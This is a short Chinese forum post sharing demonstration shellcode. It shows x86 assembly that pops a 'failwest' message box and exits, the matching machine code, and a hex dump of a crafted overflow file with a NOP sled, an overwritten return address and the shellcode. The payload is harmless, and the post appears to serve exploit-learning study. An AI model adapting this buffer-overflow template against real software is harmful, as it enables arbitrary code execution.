网上看到一份ShellCode 非常NICE ,用来抛砖引玉!
sub sp,0x440
xor ebx,ebx
push ebx
push 0x74736577
push 0x6c696166
mov eax,esp
push ebx
push eax
push eax
push ebx
mov eax,0x76F5FD1E
call eax//messagebox,修改
push ebx
mov eax,0x76BC79D8
call eax//exit(0),修改
得到机器码
013E13CC 66:81EC 4004 sub sp, 440
013E13D1 33DB xor ebx, ebx
013E13D3 53 push ebx
013E13D4 68 77657374 push 74736577
013E13D9 68 6661696C push 6C696166
013E13DE 8BC4 mov eax, esp
013E13E0 53 push ebx
013E13E1 50 push eax
013E13E2 50 push eax
013E13E3 53 push ebx
013E13E4 B8 1EFDF576 mov eax, USER32.MessageBoxA
013E13E9 FFD0 call eax
013E13EB 53 push ebx
013E13EC B8 D879BC76 mov eax, kernel32.ExitProcess
013E13F1 FFD0 call eax
写入到构造的txt文档中 为:
00000000h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 悙悙悙悙悙悙悙悙
00000010h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 悙悙悙悙悙悙悙悙
00000020h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 悙悙悙悙悙悙悙悙
00000030h: 90 90 90 90 90 90 90 90 90 90 90 90 4F AE F8 76 ; 悙悙悙悙悙悙Ov
00000040h: 33 DB 53 68 77 65 73 74 68 66 61 69 6C 8B C4 53 ; 3跾hwesthfail嬆S
00000050h: 50 50 53 B8 1E FD F5 76 FF D0 53 B8 D8 79 BC 76 ; PPS?v蠸肛y紇
00000060h: FF D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 袗悙悙悙悙悙悙?
00000070h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 悙悙悙悙悙悙悙悙
00000080h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; 悙悙悙悙悙悙悙?